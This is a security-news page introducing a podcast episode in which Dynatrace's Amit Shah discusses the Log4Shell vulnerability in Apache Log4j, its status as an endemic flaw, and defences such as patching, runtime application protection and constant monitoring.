3rd Party Risk Management , Application Security , Governance & Risk Management

How to Deal With Endemic Software Vulnerabilities

Amit Shah of Dynatrace on the Implications of Log4j, Need for Constant Monitoring
How to Deal With Endemic Software Vulnerabilities

Exploitation of the Log4Shell software vulnerability in the popular Java library Apache Log4j gives attackers complete control over any internet-connected service that uses the library anywhere in the software stack.

Amit Shah is one of the early discoverers of Log4Shell, which the Cybersecurity and Infrastructure Security Agency in July declared to be an "endemic vulnerability" that will keep popping up for years to come. Shah predicts other flaws with similar consequences will pop up as well.

In addition to patching these vulnerabilities, he recommends using runtime application protection, which he compares to "changing the locks to your house now that the burglar has keys." In fact, Shah says, nothing short of "constant monitoring of every single layer of your technology stack" - both IT and OT - is required to deal with vulnerabilities that arise because of the complexity of technology today.

In this episode of "Cybersecurity Unplugged," Shah discusses:

  • The benefits of using open-source libraries and software as well as Kubernetes and the need for "observability into how things are running in production" to identify flaws arising from their use;
  • How digital transformation's imperative of "gets things out the door faster" affects security;
  • The need for a "new approach that's going to bring everybody together, looking at the same set of data with a common understanding of what's important and what the threats are within your environment."

Shah, director of product marketing at Dynatrace, has worked with product marketing teams at Splunk and PayPal and has experience in technology roles ranging from software development to IT strategy.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing healthcareinfosecurity.com, you agree to our use of cookies.